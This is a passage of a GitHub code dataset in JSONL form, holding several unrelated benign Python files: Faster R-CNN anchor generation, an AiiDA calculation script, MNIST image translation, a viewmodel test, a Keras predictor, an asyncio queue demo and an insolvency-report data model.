width=x2 - x1,\n height=y2 - y1,\n linewidth=1,\n edgecolor=[0, 1, 0],\n facecolor='none'\n ))\n plt.show()\n\n return center_anchors, keep\n\n\nif __name__ == '__main__':\n retina_anchor = FasterRCNN_Anchor()\n\n image_sizes = [[600, 1000], [800, 800], [880, 960]]\n # tic = time.time()\n # # ** 1st experiments\n # first_anchors = []\n # for image_size in image_sizes:\n # anchor = retina_anchor.create_anchors(image_size=image_size, num_pooling=4)\n # first_anchors.append(anchor)\n # print(time.time() - tic)\n # print(\"whole time: \", time.time() - tic)\n\n # # make retina anchors\n # # 0.06779313087463379\n # # make retina anchors\n # # 0.16553187370300293\n # # make retina anchors\n # # 0.30914855003356934\n\n # ** 2nd experiments 0.0009989738464355469\n # tic = time.time()\n frcnn_anchor_maker = FRCNNAnchorMaker()\n second_anchors = []\n anchor_base = frcnn_anchor_maker.generate_anchor_base()\n # print(time.time() - tic)\n for image_size in image_sizes:\n tic = time.time()\n anchor = frcnn_anchor_maker._enumerate_shifted_anchor(origin_image_size=image_size)\n anchor = torch.from_numpy(anchor).cuda()\n # n_anchor = anchor.shape[0] / ((image_size[0] // 16) * (image_size[1] // 16))\n # print(\"num_anchors : \", n_anchor)\n # second_anchors.append(anchor)\n print(time.time() - tic)\n print(\"whole time: \", time.time() - tic)\n # print('a')\n # center_anchor = anchor\n # print(center_anchor)\n\n # 0.0010082721710205078\n # 0.001994609832763672\n # 0.002991914749145508\n\n # 약 1000배 차이\n\n\n\n","repo_name":"csm-kr/faster_rcnn_pytorch","sub_path":"anchor.py","file_name":"anchor.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"25601617243","text":"#!/usr/bin/env runaiida\n# -*- coding: utf-8 -*-\n\n# © 2017-2019, ETH Zurich, Institut für Theoretische Physik\n# Author: Dominik Gresch \n\"\"\"\nRuns a 'tbmodels slice' calculation.\n\"\"\"\n\nimport os\n\nfrom aiida.orm import Code\nfrom aiida.orm import List\nfrom aiida.orm import SinglefileData\nfrom aiida.orm.querybuilder import QueryBuilder\nfrom aiida.engine.launch import run_get_pk\n\nfrom aiida_tbmodels.calculations.slice import SliceCalculation\n\n\ndef get_singlefile_instance(description, path):\n \"\"\"\n Retrieve an instance of SinglefileData with the given description, loading it from ``path`` if it does not exist.\n \"\"\"\n query_builder = QueryBuilder()\n query_builder.append(\n SinglefileData, filters={'description': {\n '==': description\n }}\n 
{"seq_id":"73089166335","text":"\"\"\"\nSome simple tests with translating / rotating / dilating / etc. MNIST images.\n\"\"\"\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout, Flatten, Reshape\nfrom keras.optimizers import SGD, Adam\nfrom keras.utils import np_utils\nimport cv2\nimport numpy as np\n\nimg_h = 28\nimg_w = 28\n\ndef disp_img_fullscreen(img, name=\"test\"):\n    cv2.namedWindow(name, cv2.WND_PROP_FULLSCREEN)\n    cv2.setWindowProperty(name, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n    cv2.imshow(name,img)\n    cv2.waitKey(0)\n    cv2.destroyAllWindows()\n\ndef get_concatenated_row(samples):\n    \"\"\"\n    Concatenate each sample in samples horizontally, along axis 1.\n    Return the resulting array.\n    \"\"\"\n    return np.concatenate([sample for sample in samples], axis=1)\n\ndef get_concatenated_col(samples):\n    \"\"\"\n    Concatenate each sample in samples vertically, along axis 0.\n    Return the resulting array.\n    \"\"\"\n    return np.concatenate([sample for sample in samples], axis=0)\n\ndef transform_samples(samples, T):\n    \"\"\"\n    Given a 3d matrix samples and a transformation matrix T,\n    return a new 3d samples matrix with each image transformed appropriately.\n    \"\"\"\n    transformed_samples = np.zeros_like(samples)\n    img_h, img_w = samples.shape[-2:]\n    for i, sample in enumerate(samples):\n        transformed_samples[i] = cv2.warpAffine(sample, T, (img_w, img_h))\n    return transformed_samples\n\ndef translate_samples(samples, dx, dy):\n    \"\"\"\n    Given a 3d matrix samples, the translation delta x and delta y,\n    return a new 3d samples matrix with each image translated appropriately.\n    \"\"\"\n    # First generate the translation matrix for cv2's warpAffine function\n    T = np.float32([[1,0,dx], [0,1,dy]])\n\n    return transform_samples(samples, T)\n\n(X_train, Y_train), (X_test, Y_test) = mnist.load_data()\n\n\"\"\"\nConvert to float32\n\"\"\"\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\n\n\"\"\"\nFeature Scale\n\"\"\"\nX_train /= 255\nX_test /= 255\n\n\"\"\"\nDisplay some outputs:\n    Get a small portion of the test set, and get transformed samples\n\"\"\"\ndisplay_test_n = 16\nactual_samples = X_test[:display_test_n]\nx_translated_samples = translate_samples(actual_samples, 0, 10)\ny_translated_samples = translate_samples(actual_samples, 10, 0)\n\n\"\"\"\nThen create a row of actual samples, and a row for each transformation's samples.\nWe can then stack them on top of each other for easy multiple image comparison.\n\"\"\"\nactual_samples = get_concatenated_row(actual_samples)\nx_translated_samples = get_concatenated_row(x_translated_samples)\ny_translated_samples = get_concatenated_row(y_translated_samples)\ncomparison_img = get_concatenated_col((actual_samples, x_translated_samples, y_translated_samples))\ndisp_img_fullscreen(comparison_img)\n","repo_name":"BlueHephaestus/transforming-autoencoder-experiments","sub_path":"affine_tests/mnist_data_transformer.py","file_name":"mnist_data_transformer.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"39209224267","text":"from src.modules.drop_activity.app.drop_activity_viewmodel import DropActivityViewmodel\nfrom src.shared.infra.repositories.activity_repository_mock import ActivityRepositoryMock\nfrom src.shared.infra.repositories.user_repository_mock import UserRepositoryMock\n\n\nclass Test_DropActivityViewmodel:\n\n    def test_drop_activity_viewmodel(self):\n        repo = ActivityRepositoryMock()\n        repo_user = UserRepositoryMock()\n\n        enrollment = repo.enrollments[8]\n\n        drop_activity_viewmodel = DropActivityViewmodel(enrollment, repo_user.users[3]).to_dict()\n\n        expected = {'activity_code': \"COD1468\",\n                    'user': {'name': 'Pedro Marcelino', 'user_id': '0355573c-a110-11ed-a8fc-0242ac120002', 'role': 'INTERNATIONAL_STUDENT'},\n                    'state': 'DROPPED', 'date_subscribed': 1671488212000,\n                    'message': 'the enrollment was dropped'}\n\n        assert drop_activity_viewmodel == expected\n","repo_name":"Maua-Dev/smile_mss_activity","sub_path":"tests/modules/drop_activity/app/test_drop_activity_viewmodel.py","file_name":"test_drop_activity_viewmodel.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
{"seq_id":"37845292052","text":"from keras.preprocessing.image import img_to_array\nfrom keras.models import load_model\nfrom imutils import contours\nfrom imutils import paths\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\n\nsize_width=64\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--input\", required=True,\n\thelp=\"path to input directory of images\")\nap.add_argument(\"-m\", \"--model\", required=True,\n\thelp=\"path to input model\")\nargs = vars(ap.parse_args())\n\n# load the pre-trained network\nprint(\"[INFO] loading pre-trained network...\")\nmodel = load_model(args[\"model\"])\n\nimagePaths = list(paths.list_images(args[\"input\"]))\n\nfor imagePath in imagePaths:\n\t# load the image, convert it to grayscale, and resize it to the\n\t# input size the network expects\n\timage = cv2.imread(imagePath)\n\timage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\timage = cv2.resize(image, (size_width, size_width))\n\timage = image.astype(\"float\") / 255.0\n\timage = img_to_array(image)\n\timage = np.expand_dims(image, axis=0)\n\t(pred1, pred2) = model.predict(image)[0]\n\tlabel = \"chef\" if pred1 > pred2 else \"doctor\"\n\tprint(imagePath+\":\"+label+\":\"+str(pred1)+\":\"+str(pred2))\n\t# print(str(pred1))\n\n\t# show the output image\n","repo_name":"vincentchung/lenetPredict","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
{"seq_id":"7538401582","text":"#!/usr/bin/env python\n\nimport asyncio\nfrom pprint import pprint\nimport time\nimport random\n\nfinal_result = []\n\nasync def producer(q):\n    for i in range(100):\n        q.put_nowait(i)\n\nasync def consumer(q_in,q_out,name):\n    while True:\n        item = await q_in.get()\n        print(name,item)\n        result = (item,item**2,name)\n        q_out.put_nowait(result)\n        q_in.task_done()\n        await asyncio.sleep(random.randint(1,2))\n\nasync def writer(q_out):\n    while True:\n        result = await q_out.get()\n        final_result.append(result)\n        print(\"writer\",result)\n        q_out.task_done()\n\n\n\nasync def main():\n    q_in = asyncio.Queue()\n    q_out = asyncio.Queue()\n    task_consumers = [asyncio.create_task(consumer(q_in,q_out,f\"consumer {i}\")) for i in range(10)]\n    task_producer = asyncio.create_task(producer(q_in))\n    task_writer = asyncio.create_task(writer(q_out))\n\n    await asyncio.gather(task_producer)\n    await q_in.join()\n    # wait until the writer has drained q_out, so final_result is complete\n    await q_out.join()\n\n    for t in task_consumers:\n        t.cancel()\n    task_writer.cancel()\n\n    pprint(final_result)\n\nif __name__ == '__main__':\n    asyncio.run(main())","repo_name":"fgaurat/pythonperf25042022","sub_path":"tp08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"32005253535","text":"from .isir_dokument import IsirDokument\n\n\nclass PrubehRizeni:\n    def __init__(self):\n        self.Oddluzeni_povoleno = None\n        self.Oddluzeni_schvaleno = None\n        self.Zahajeno = None\n        self.Zjisteni_upadku = None\n\n\nclass VysledekRizeni:\n    def __init__(self):\n        self.Posledni_splatka = None\n        self.Zaslani_vyzvy_ukonceni_srazek = None\n        self.Doporuceni_spravce = None\n        self.Doporuceni_spravce_oduvodneni = None\n        self.Zprava_o_prubehu = None\n        self.Predpoklad_uspokojeni_nezaj_mira = None\n        self.Predpoklad_uspokojeni_nezaj_vyse = None\n        self.Uspokojeni_nezaj_mira = None\n        self.Uspokojeni_nezaj_vyse = None\n        self.Uspokojeni_zaj_mira = None\n        self.Uspokojeni_zaj_vyse = None\n        self.Preplatek = None\n\n\nclass OdmenaSpravce:\n    def __init__(self):\n        self.Celkova_odmena = None\n        self.Celkova_odmena_uhrazeno = None\n        self.Hotove_vydaje = None\n        self.Hotove_vydaje_uhrazeno = None\n        self.Vytezek_zpenezeni_rozdeleni = None\n        self.Vytezek_zpenezeni_rozdeleni_uhrazeno = None\n        self.Vytezek_zpenezeni_zaji = None\n        self.Vytezek_zpenezeni_zaji_uhrazeno = None\n        self.Zprava_spravce = None\n\n\nclass ZpravaSplneniOddluzeni(IsirDokument):\n\n    TYP_DOKUMENTU = \"ZpravaSplneniOddluzeni\"\n\n    def __init__(self):\n        super().__init__()\n\n        self.Prubeh_rizeni = PrubehRizeni()\n        self.Vysledek_rizeni = VysledekRizeni()\n        self.Odmena_spravce = OdmenaSpravce()\n","repo_name":"opendatalabcz/isir-explorer","sub_path":"pdf-scraper/isir_explorer/scraper/parser/model/zprava_splneni_oddluzeni.py","file_name":"zprava_splneni_oddluzeni.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"sk","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}